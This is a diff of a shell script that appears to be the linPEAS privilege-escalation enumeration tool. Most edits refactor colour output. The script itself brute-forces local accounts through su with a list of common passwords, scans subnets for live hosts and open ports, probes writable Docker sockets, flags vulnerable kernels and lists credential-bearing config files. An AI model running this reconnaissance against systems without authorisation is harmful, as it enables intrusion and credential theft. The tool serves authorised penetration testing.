$PASSWORD & #Try given password fi - for i in `seq $TRIES`; do + for i in `seq $TRIES`; do su_try_pwd $BFUSER `echo $top2000pwds | cut -d " " -f $i` & #Try TOP TRIES of passwords (by default 2000) sleep 0.007 # To not overload the system done @@ -547,7 +635,7 @@ check_if_su_brute(){ error=$(echo "" | timeout 1 su `whoami` -c whoami 2>&1); if [ ! "`echo $error | grep "must be run from a terminal"`" ]; then echo "1" - fi + fi } eval_bckgrd(){ @@ -581,7 +669,7 @@ check_dns(){ # Adapted from https://github.com/carlospolop/bashReconScan/blob/master/brs.sh basic_net_info(){ - printf $B"═══════════════════════════╣ "$GREEN"Basic Network Info"$B" ╠═════════════════════════════\n"$NC + print_title "Basic Network Info" (ifconfig || ip a) 2>/dev/null echo "" } @@ -592,19 +680,19 @@ select_nc (){ $($FOUND_NC 127.0.0.1 65321 > /dev/null 2>&1) if [ $? -eq 2 ] then - NC_SCAN="timeout 1 $FOUND_NC -v -n" + NC_SCAN="timeout 1 $FOUND_NC -v -n" fi } icmp_recon (){ #Discover hosts inside a /24 subnetwork using ping (start pingging broadcast addresses) IP3=$(echo $1 | cut -d "." -f 1,2,3) - - (timeout 1 ping -b -c 1 "$IP3.255" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${C}[1;31m&${C}[0m,") & - (timeout 1 ping -b -c 1 "255.255.255.255" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${C}[1;31m&${C}[0m,") & + + (timeout 1 ping -b -c 1 "$IP3.255" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${SED_RED},") & + (timeout 1 ping -b -c 1 "255.255.255.255" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${SED_RED},") & for j in $(seq 0 254) do - (timeout 1 ping -b -c 1 "$IP3.$j" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${C}[1;31m&${C}[0m,") & + (timeout 1 ping -b -c 1 "$IP3.$j" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${SED_RED},") & done wait } @@ -613,13 +701,13 @@ tcp_recon (){ #Discover hosts inside a /24 subnetwork using tcp connection to most used ports and selected ones IP3=$(echo $1 | cut -d "." -f 1,2,3) PORTS=$2 - printf $Y"[+]$B Ports going to be scanned: $PORTS" $NC | tr '\n' " " + printf ${YELLOW}"[+]${BLUE} Ports going to be scanned: $PORTS" $NC | tr '\n' " " printf "$NC\n" for port in $PORTS; do for j in $(seq 1 254) - do - ($NC_SCAN $IP3.$j $port 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -${E} "s,[0-9\.],${C}[1;31m&${C}[0m,g") & + do + ($NC_SCAN $IP3.$j $port 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -${E} "s,[0-9\.],${SED_RED},g") & done wait done @@ -629,22 +717,22 @@ tcp_port_scan (){ #Scan open ports of a host. Default: nmap top 1000, but the user can select others basic_net_info - printf $B"═══════════════════════════════════╣ "$GREEN"Network Port Scanning"$B" ╠═══════════════════════════════════\n"$NC + print_title "Network Port Scanning" IP=$1 PORTS="$2" PORTS="`echo \"$PORTS\" | tr ',' ' '`" if [ -z "$PORTS" ]; then - printf $Y"[+]$B Ports going to be scanned: DEFAULT (nmap top 1000)" $NC | tr '\n' " " + printf ${YELLOW}"[+]${BLUE} Ports going to be scanned: DEFAULT (nmap top 1000)" $NC | tr '\n' " " printf "$NC\n" PORTS="1 3 4 6 7 9 13 17 19 20 21 22 23 24 25 26 30 32 33 37 42 43 49 53 70 79 80 81 82 83 84 85 88 89 90 99 100 106 109 110 111 113 119 125 135 139 143 144 146 161 163 179 199 211 212 222 254 255 256 259 264 280 301 306 311 340 366 389 406 407 416 417 425 427 443 444 445 458 464 465 481 497 500 512 513 514 515 524 541 543 544 545 548 554 555 563 587 593 616 617 625 631 636 646 648 666 667 668 683 687 691 700 705 711 714 720 722 726 749 765 777 783 787 800 801 808 843 873 880 888 898 900 901 902 903 911 912 981 987 990 992 993 995 999 1000 1001 1002 1007 1009 1010 1011 1021 1022 1023 1024 1025 1026 1027 1028 1029 1030 1031 1032 1033 1034 1035 1036 1037 1038 1039 1040 1041 1042 1043 1044 1045 1046 1047 1048 1049 1050 1051 1052 1053 1054 1055 1056 1057 1058 1059 1060 1061 1062 1063 1064 1065 1066 1067 1068 1069 1070 1071 1072 1073 1074 1075 1076 1077 1078 1079 1080 1081 1082 1083 1084 1085 1086 1087 1088 1089 1090 1091 1092 1093 1094 1095 1096 1097 1098 1099 1100 1102 1104 1105 1106 1107 1108 1110 1111 1112 1113 1114 1117 1119 1121 1122 1123 1124 1126 1130 1131 1132 1137 1138 1141 1145 1147 1148 1149 1151 1152 1154 1163 1164 1165 1166 1169 1174 1175 1183 1185 1186 1187 1192 1198 1199 1201 1213 1216 1217 1218 1233 1234 1236 1244 1247 1248 1259 1271 1272 1277 1287 1296 1300 1301 1309 1310 1311 1322 1328 1334 1352 1417 1433 1434 1443 1455 1461 1494 1500 1501 1503 1521 1524 1533 1556 1580 1583 1594 1600 1641 1658 1666 1687 1688 1700 1717 1718 1719 1720 1721 1723 1755 1761 1782 1783 1801 1805 1812 1839 1840 1862 1863 1864 1875 1900 1914 1935 1947 1971 1972 1974 1984 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2013 2020 2021 2022 2030 2033 2034 2035 2038 2040 2041 2042 2043 2045 2046 2047 2048 2049 2065 2068 2099 2100 2103 2105 2106 2107 2111 2119 2121 2126 2135 2144 2160 2161 2170 2179 2190 2191 2196 2200 2222 2251 2260 2288 2301 2323 2366 2381 2382 2383 2393 2394 2399 2401 2492 2500 2522 2525 2557 2601 2602 2604 2605 2607 2608 2638 2701 2702 2710 2717 2718 2725 2800 2809 2811 2869 2875 2909 2910 2920 2967 2968 2998 3000 3001 3003 3005 3006 3007 3011 3013 3017 3030 3031 3052 3071 3077 3128 3168 3211 3221 3260 3261 3268 3269 3283 3300 3301 3306 3322 3323 3324 3325 3333 3351 3367 3369 3370 3371 3372 3389 3390 3404 3476 3493 3517 3527 3546 3551 3580 3659 3689 3690 3703 3737 3766 3784 3800 3801 3809 3814 3826 3827 3828 3851 3869 3871 3878 3880 3889 3905 3914 3918 3920 3945 3971 3986 3995 3998 4000 4001 4002 4003 4004 4005 4006 4045 4111 4125 4126 4129 4224 4242 4279 4321 4343 4443 4444 4445 4446 4449 4550 4567 4662 4848 4899 4900 4998 5000 5001 5002 5003 5004 5009 5030 5033 5050 5051 5054 5060 5061 5080 5087 5100 5101 5102 5120 5190 5200 5214 5221 5222 5225 5226 5269 5280 5298 5357 5405 5414 5431 5432 5440 5500 5510 5544 5550 5555 5560 5566 5631 5633 5666 5678 5679 5718 5730 5800 5801 5802 5810 5811 5815 5822 5825 5850 5859 5862 5877 5900 5901 5902 5903 5904 5906 5907 5910 5911 5915 5922 5925 5950 5952 5959 5960 5961 5962 5963 5987 5988 5989 5998 5999 6000 6001 6002 6003 6004 6005 6006 6007 6009 6025 6059 6100 6101 6106 6112 6123 6129 6156 6346 6389 6502 6510 6543 6547 6565 6566 6567 6580 6646 6666 6667 6668 6669 6689 6692 6699 6779 6788 6789 6792 6839 6881 6901 6969 7000 7001 7002 7004 7007 7019 7025 7070 7100 7103 7106 7200 7201 7402 7435 7443 7496 7512 7625 7627 7676 7741 7777 7778 7800 7911 7920 7921 7937 7938 7999 8000 8001 8002 8007 8008 8009 8010 8011 8021 8022 8031 8042 8045 8080 8081 8082 8083 8084 8085 8086 8087 8088 8089 8090 8093 8099 8100 8180 8181 8192 8193 8194 8200 8222 8254 8290 8291 8292 8300 8333 8383 8400 8402 8443 8500 8600 8649 8651 8652 8654 8701 8800 8873 8888 8899 8994 9000 9001 9002 9003 9009 9010 9011 9040 9050 9071 9080 9081 9090 9091 9099 9100 9101 9102 9103 9110 9111 9200 9207 9220 9290 9415 9418 9485 9500 9502 9503 9535 9575 9593 9594 9595 9618 9666 9876 9877 9878 9898 9900 9917 9929 9943 9944 9968 9998 9999 10000 10001 10002 10003 10004 10009 10010 10012 10024 10025 10082 10180 10215 10243 10566 10616 10617 10621 10626 10628 10629 10778 11110 11111 11967 12000 12174 12265 12345 13456 13722 13782 13783 14000 14238 14441 14442 15000 15002 15003 15004 15660 15742 16000 16001 16012 16016 16018 16080 16113 16992 16993 17877 17988 18040 18101 18988 19101 19283 19315 19350 19780 19801 19842 20000 20005 20031 20221 20222 20828 21571 22939 23502 24444 24800 25734 25735 26214 27000 27352 27353 27355 27356 27715 28201 30000 30718 30951 31038 31337 32768 32769 32770 32771 32772 32773 32774 32775 32776 32777 32778 32779 32780 32781 32782 32783 32784 32785 33354 33899 34571 34572 34573 35500 38292 40193 40911 41511 42510 44176 44442 44443 44501 45100 48080 49152 49153 49154 49155 49156 49157 49158 49159 49160 49161 49163 49165 49167 49175 49176 49400 49999 50000 50001 50002 50003 50006 50300 50389 50500 50636 50800 51103 51493 52673 52822 52848 52869 54045 54328 55055 55056 55555 55600 56737 56738 57294 57797 58080 60020 60443 61532 61900 62078 63331 64623 64680 65000 65129 65389 3 4 6 7 9 13 17 19 20 21 22 23 24 25 26 30 32 33 37 42 43 49 53 70 79 80 81 82 83 84 85 88 89 90 99 100 106 109 110 111 113 119 125 135 139 143 144 146 161 163 179 199 211 212 222 254 255 256 259 264 280 301 306 311 340 366 389 406 407 416 417 425 427 443 444 445 458 464 465 481 497 500 512 513 514 515 524 541 543 544 545 548 554 555 563 587 593 616 617 625 631 636 646 648 666 667 668 683 687 691 700 705 711 714 720 722 726 749 765 777 783 787 800 801 808 843 873 880 888 898 900 901 902 903 911 912 981 987 990 992 993 995 999 1000 1001 1002 1007 1009 1010 1011 1021 1022 1023 1024 1025 1026 1027 1028 1029 1030 1031 1032 1033 1034 1035 1036 1037 1038 1039 1040 1041 1042 1043 1044 1045 1046 1047 1048 1049 1050 1051 1052 1053 1054 1055 1056 1057 1058 1059 1060 1061 1062 1063 1064 1065 1066 1067 1068 1069 1070 1071 1072 1073 1074 1075 1076 1077 1078 1079 1080 1081 1082 1083 1084 1085 1086 1087 1088 1089 1090 1091 1092 1093 1094 1095 1096 1097 1098 1099 1100 1102 1104 1105 1106 1107 1108 1110 1111 1112 1113 1114 1117 1119 1121 1122 1123 1124 1126 1130 1131 1132 1137 1138 1141 1145 1147 1148 1149 1151 1152 1154 1163 1164 1165 1166 1169 1174 1175 1183 1185 1186 1187 1192 1198 1199 1201 1213 1216 1217 1218 1233 1234 1236 1244 1247 1248 1259 1271 1272 1277 1287 1296 1300 1301 1309 1310 1311 1322 1328 1334 1352 1417 1433 1434 1443 1455 1461 1494 1500 1501 1503 1521 1524 1533 1556 1580 1583 1594 1600 1641 1658 1666 1687 1688 1700 1717 1718 1719 1720 1721 1723 1755 1761 1782 1783 1801 1805 1812 1839 1840 1862 1863 1864 1875 1900 1914 1935 1947 1971 1972 1974 1984 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2013 2020 2021 2022 2030 2033 2034 2035 2038 2040 2041 2042 2043 2045 2046 2047 2048 2049 2065 2068 2099 2100 2103 2105 2106 2107 2111 2119 2121 2126 2135 2144 2160 2161 2170 2179 2190 2191 2196 2200 2222 2251 2260 2288 2301 2323 2366 2381 2382 2383 2393 2394 2399 2401 2492 2500 2522 2525 2557 2601 2602 2604 2605 2607 2608 2638 2701 2702 2710 2717 2718 2725 2800 2809 2811 2869 2875 2909 2910 2920 2967 2968 2998 3000 3001 3003 3005 3006 3007 3011 3013 3017 3030 3031 3052 3071 3077 3128 3168 3211 3221 3260 3261 3268 3269 3283 3300 3301 3306 3322 3323 3324 3325 3333 3351 3367 3369 3370 3371 3372 3389 3390 3404 3476 3493 3517 3527 3546 3551 3580 3659 3689 3690 3703 3737 3766 3784 3800 3801 3809 3814 3826 3827 3828 3851 3869 3871 3878 3880 3889 3905 3914 3918 3920 3945 3971 3986 3995 3998 4000 4001 4002 4003 4004 4005 4006 4045 4111 4125 4126 4129 4224 4242 4279 4321 4343 4443 4444 4445 4446 4449 4550 4567 4662 4848 4899 4900 4998 5000 5001 5002 5003 5004 5009 5030 5033 5050 5051 5054 5060 5061 5080 5087 5100 5101 5102 5120 5190 5200 5214 5221 5222 5225 5226 5269 5280 5298 5357 5405 5414 5431 5432 5440 5500 5510 5544 5550 5555 5560 5566 5631 5633 5666 5678 5679 5718 5730 5800 5801 5802 5810 5811 5815 5822 5825 5850 5859 5862 5877 5900 5901 5902 5903 5904 5906 5907 5910 5911 5915 5922 5925 5950 5952 5959 5960 5961 5962 5963 5987 5988 5989 5998 5999 6000 6001 6002 6003 6004 6005 6006 6007 6009 6025 6059 6100 6101 6106 6112 6123 6129 6156 6346 6389 6502 6510 6543 6547 6565 6566 6567 6580 6646 6666 6667 6668 6669 6689 6692 6699 6779 6788 6789 6792 6839 6881 6901 6969 7000 7001 7002 7004 7007 7019 7025 7070 7100 7103 7106 7200 7201 7402 7435 7443 7496 7512 7625 7627 7676 7741 7777 7778 7800 7911 7920 7921 7937 7938 7999 8000 8001 8002 8007 8008 8009 8010 8011 8021 8022 8031 8042 8045 8080 8081 8082 8083 8084 8085 8086 8087 8088 8089 8090 8093 8099 8100 8180 8181 8192 8193 8194 8200 8222 8254 8290 8291 8292 8300 8333 8383 8400 8402 8443 8500 8600 8649 8651 8652 8654 8701 8800 8873 8888 8899 8994 9000 9001 9002 9003 9009 9010 9011 9040 9050 9071 9080 9081 9090 9091 9099 9100 9101 9102 9103 9110 9111 9200 9207 9220 9290 9415 9418 9485 9500 9502 9503 9535 9575 9593 9594 9595 9618 9666 9876 9877 9878 9898 9900 9917 9929 9943 9944 9968 9998 9999 10000 10001 10002 10003 10004 10009 10010 10012 10024 10025 10082 10180 10215 10243 10566 10616 10617 10621 10626 10628 10629 10778 11110 11111 11967 12000 12174 12265 12345 13456 13722 13782 13783 14000 14238 14441 14442 15000 15002 15003 15004 15660 15742 16000 16001 16012 16016 16018 16080 16113 16992 16993 17877 17988 18040 18101 18988 19101 19283 19315 19350 19780 19801 19842 20000 20005 20031 20221 20222 20828 21571 22939 23502 24444 24800 25734 25735 26214 27000 27352 27353 27355 27356 27715 28201 30000 30718 30951 31038 31337 32768 32769 32770 32771 32772 32773 32774 32775 32776 32777 32778 32779 32780 32781 32782 32783 32784 32785 33354 33899 34571 34572 34573 35500 38292 40193 40911 41511 42510 44176 44442 44443 44501 45100 48080 49152 49153 49154 49155 49156 49157 49158 49159 49160 49161 49163 49165 49167 49175 49176 49400 49999 50000 50001 50002 50003 50006 50300 50389 50500 50636 50800 51103 51493 52673 52822 52848 52869 54045 54328 55055 55056 55555 55600 56737 56738 57294 57797 58080 60020 60443 61532 61900 62078 63331 64623 64680 65000 65129 65389" else - printf $Y"[+]$B Ports going to be scanned: $PORTS" $NC | tr '\n' " " + printf ${YELLOW}"[+]${BLUE} Ports going to be scanned: $PORTS" $NC | tr '\n' " " printf "$NC\n" fi for port in $PORTS; do - ($NC_SCAN $IP $port 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -${E} "s,[0-9\.],${C}[1;31m&${C}[0m,g") & + ($NC_SCAN $IP $port 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -${E} "s,[0-9\.],${SED_RED},g") & done wait } @@ -653,32 +741,32 @@ discover_network (){ #Check if IP and Netmask are correct and the use fping or ping to find hosts basic_net_info - printf $B"════════════════════════════════════╣ "$GREEN"Network Discovery"$B" ╠════════════════════════════════════\n"$NC + print_title "Network Discovery" DISCOVERY=$1 IP=$(echo $DISCOVERY | cut -d "/" -f 1) NETMASK=$(echo $DISCOVERY | cut -d "/" -f 2) - + if [ -z $IP ] || [ -z $NETMASK ]; then printf $RED"[-] Err: Bad format. Example: 127.0.0.1/24"$NC; - printf $B"$HELP"$NC; + printf ${BLUE}"$HELP"$NC; exit 0 fi #Using fping if possible - if [ "$FPING" ]; then - $FPING -a -q -g $DISCOVERY | sed -${E} "s,.*,${C}[1;31m&${C}[0m," - + if [ "$FPING" ]; then + $FPING -a -q -g $DISCOVERY | sed -${E} "s,.*,${SED_RED}," + #Loop using ping else if [ $NETMASK -eq "24" ]; then - printf $Y"[+]$GREEN Netmask /24 detected, starting...\n$NC" + printf ${YELLOW}"[+]$GREEN Netmask /24 detected, starting...\n$NC" icmp_recon $IP - + elif [ $NETMASK -eq "16" ]; then - printf $Y"[+]$GREEN Netmask /16 detected, starting...\n$NC" + printf ${YELLOW}"[+]$GREEN Netmask /16 detected, starting...\n$NC" for i in $(seq 1 254) - do + do NEWIP=$(echo $IP | cut -d "." -f 1,2).$i.1 icmp_recon $NEWIP done @@ -693,20 +781,20 @@ discovery_port_scan (){ basic_net_info #Check if IP and Netmask are correct and the use nc to find hosts. By default check ports: 22 80 443 445 3389 - printf $B"═══════════════════════════╣ "$GREEN"Network Discovery (scanning ports)"$B" ╠═════════════════════════════\n"$NC + print_title "Network Discovery (scanning ports)" DISCOVERY=$1 MYPORTS=$2 IP=$(echo $DISCOVERY | cut -d "/" -f 1) NETMASK=$(echo $DISCOVERY | cut -d "/" -f 2) echo "Scanning: $DISCOVERY" - + if [ -z "$IP" ] || [ -z "$NETMASK" ] || [ "$IP" = "$NETMASK" ]; then printf $RED"[-] Err: Bad format. Example: 127.0.0.1/24\n"$NC; if [ "$IP" = "$NETMASK" ]; then - printf $RED"[*] This options is used to find active hosts by scanning ports. If you want to perform a port scan of a host use the options: $Y-i [-p ]\n\n"$NC; + printf $RED"[*] This options is used to find active hosts by scanning ports. If you want to perform a port scan of a host use the options: ${YELLOW}-i [-p ]\n\n"$NC; fi - printf $B"$HELP"$NC; + printf ${BLUE}"$HELP"$NC; exit 0 fi @@ -714,13 +802,13 @@ discovery_port_scan (){ PORTS=`echo "$PORTS" | tr " " "\n" | sort -u` #Delete repetitions if [ "$NETMASK" -eq "24" ]; then - printf $Y"[+]$GREEN Netmask /24 detected, starting...\n" $NC + printf ${YELLOW}"[+]$GREEN Netmask /24 detected, starting...\n" $NC tcp_recon $IP "$PORTS" - + elif [ "$NETMASK" -eq "16" ]; then - printf $Y"[+]$GREEN Netmask /16 detected, starting...\n" $NC + printf ${YELLOW}"[+]$GREEN Netmask /16 detected, starting...\n" $NC for i in $(seq 0 255) - do + do NEWIP=$(echo $IP | cut -d "." -f 1,2).$i.1 tcp_recon $NEWIP "$PORTS" done @@ -756,7 +844,7 @@ containerCheck() { grep "/docker/" /proc/1/cgroup -qa 2>/dev/null || grep -qai docker /proc/self/cgroup 2>/dev/null || [ "`find / -maxdepth 3 -name \"*dockerenv*\" -exec ls -la {} \; 2>/dev/null`" ] ; then - + inContainer="1" containerType="docker" fi @@ -772,12 +860,28 @@ containerCheck() { fi # Are we inside LXC? - if env | grep "container=lxc" -qa 2>/dev/null || + if env | grep "container=lxc" -qa 2>/dev/null || grep "/lxc/" /proc/1/cgroup -qa 2>/dev/null; then - + inContainer="1" containerType="lxc" fi + + # Are we inside podman? + if env | grep -qa "container=podman" 2>/dev/null || + grep -qa "container=podman" /proc/1/environ 2>/dev/null; then + + inContainer="1" + containerType="podman" + fi + + # Check for other container platforms that report themselves in PID 1 env + if [ -z "$inContainer" ]; then + if grep -a 'container=' /proc/1/environ 2>/dev/null; then + inContainer="1" + containerType="`grep -a 'container=' /proc/1/environ | cut -d= -f2`" + fi + fi } inDockerGroup() { @@ -799,26 +903,26 @@ enumerateDockerSockets() { if ! [ "$SEARCHED_DOCKER_SOCKETS" ]; then SEARCHED_DOCKER_SOCKETS="1" for dock_sock in `find / ! -path "/sys/*" -type s -name "docker.sock" -o -name "docker.socket" 2>/dev/null`; do - if [ -w "$dock_sock" ]; then - echo "You have write permissions over Docker socket $dock_sock" | sed -${E} "s,$dock_sock,${C}[1;31;103m&${C}[0m,g" + if ! [ "$IAMROOT" ] && [ -w "$dock_sock" ]; then + echo "You have write permissions over Docker socket $dock_sock" | sed -${E} "s,$dock_sock,${SED_RED_YELLOW},g" echo "Docker enummeration:" docker_enumerated="" - + if [ "$(command -v curl)" ]; then sockInfoResponse="`curl -s --unix-socket \"$dockerSockPath\" http://localhost/info`" dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'ServerVersion' | cut -d'"' -f 4) echo $sockInfoResponse | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"' if [ "$sockInfoResponse" ]; then docker_enumerated="1"; fi fi - + if [ "$(command -v docker)" ] and ![ "$docker_enumerated" ]; then sockInfoResponse="`docker info`" dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'Server Version' | cut -d' ' -f 4) printf $sockInfoResponse | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"' fi - + else - echo "You don't have write permissions over Docker socket $dock_sock" | sed -${E} "s,$dock_sock,${C}[1;32m&${C}[0m,g" + echo "You don't have write permissions over Docker socket $dock_sock" | sed -${E} "s,$dock_sock,${SED_GREEN},g" fi done fi @@ -857,29 +961,29 @@ checkContainerExploits() { #-----------) Some Basic Info (-----------# ########################################### -printf $B"════════════════════════════════════╣ "$GREEN"Basic information"$B" ╠════════════════════════════════════\n"$NC +print_title "Basic information" printf $LG"OS: "$NC -(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel5_1,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel5_2,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel5_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_1,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_2,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_4,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel7,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelB,${C}[1;31m&${C}[0m," +(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED}," printf $LG"User & Groups: "$NC -(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$groupsVB,${C}[1;31;103m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$knw_grps,${C}[1;32m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$idB,${C}[1;31m&${C}[0m,g" +(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$idB,${SED_RED},g" printf $LG"Hostname: "$NC hostname 2>/dev/null printf $LG"Writable folder: "$NC; echo $Wfolder if [ "$DISCOVER_BAN_GOOD" ]; then - printf $Y"[+] $DISCOVER_BAN_GOOD\n"$NC + printf ${YELLOW}"[+] $DISCOVER_BAN_GOOD\n"$NC else printf $RED"[-] $DISCOVER_BAN_BAD\n"$NC fi if [ "$SCAN_BAN_GOOD" ]; then - printf $Y"[+] $SCAN_BAN_GOOD\n"$NC + printf ${YELLOW}"[+] $SCAN_BAN_GOOD\n"$NC else printf $RED"[-] $SCAN_BAN_BAD\n"$NC fi if [ "`command -v nmap 2>/dev/null`" ];then - NMAP_GOOD=$GREEN"nmap$B is available for network discover & port scanning, you should use it yourself" - printf $Y"[+] $NMAP_GOOD\n"$NC + NMAP_GOOD=$GREEN"nmap${BLUE} is available for network discover & port scanning, you should use it yourself" + printf ${YELLOW}"[+] $NMAP_GOOD\n"$NC fi echo "" echo "" @@ -891,7 +995,7 @@ if [ "$PORTS" ]; then if [ "$SCAN_BAN_GOOD" ]; then if [ "`echo -n $PORTS | sed 's,[0-9, ],,g'`" ]; then printf $RED"[-] Err: Symbols detected in the port, for discovering purposes select only 1 port\n"$NC; - printf $B"$HELP"$NC; + printf ${BLUE}"$HELP"$NC; exit 0 else #Select the correct configuration of the netcat found @@ -899,10 +1003,10 @@ if [ "$PORTS" ]; then fi else printf $RED" Err: Port scan not possible, any netcat in PATH\n"$NC; - printf $B"$HELP"$NC; + printf ${BLUE}"$HELP"$NC; exit 0 fi -fi +fi if [ "$DISCOVERY" ]; then if [ "$PORTS" ]; then @@ -917,7 +1021,7 @@ if [ "$DISCOVERY" ]; then exit 0 elif [ "$IP" ]; then - select_nc + select_nc tcp_port_scan $IP "$PORTS" exit 0 fi @@ -927,170 +1031,148 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ] || [ "`echo $CHECKS | grep ########################################### #----------) Caching Finds (--------------# ########################################### - - prep_to_find() { - echo "$1" | sed 's/ /" -o -name "/g' | sed 's/^/ -name "/g' | sed 's/$/" /g' - } - printf $GREEN"Caching directories using$Y $THREADS$GREEN threads "$NC - SYSTEMD_RELEVANT_NAMES="*.service" - TIMERS_RELEVANT_NAMES="*.timer" - SOCKETS_RELEVANT_NAMES="*.socket" - DBUS_RELEVANT_NAMES="system.d session.d" - - MYSQL_RELEVANT_NAMES="mysql" - POSTGRESQL_RELEVANT_NAMES="pgadmin*.db pg_hba.conf postgresql.conf pgsql.conf" - APACHE_RELEVANT_NAMES="sites-enabled 000-default" - PHP_RELEVANT_NAMES="sess_* *config*.php database.php db.php storage.php" - WORDPRESS_RELEVANT_NAMES="wp-config.php" - DRUPAL_RELEVANT_NAMES="settings.php" - MOODLE_RELEVANT_NAMES="/config.php" - TOMCAT_RELEVANT_NAMES="tomcat-users.xml" - MONGO_RELEVANT_NAMES="mongod*.conf" - SUPERVISORD_RELEVANT_NAMES="supervisord.conf" - CESI_RELEVANT_NAMES="cesi.conf" - RSYNCD_RELEVANT_NAMES="rsyncd.conf rsyncd.secrets" - HOSTAPAD_RELEVANT_NAMES="hostapd.conf" - ANACONDA_KS_RELEVANT_NAMES="anaconda-ks.cfg" - VNC_RELEVANT_NAMES=".vnc" - LDAP_RELEVANT_NAMES="ldap" - 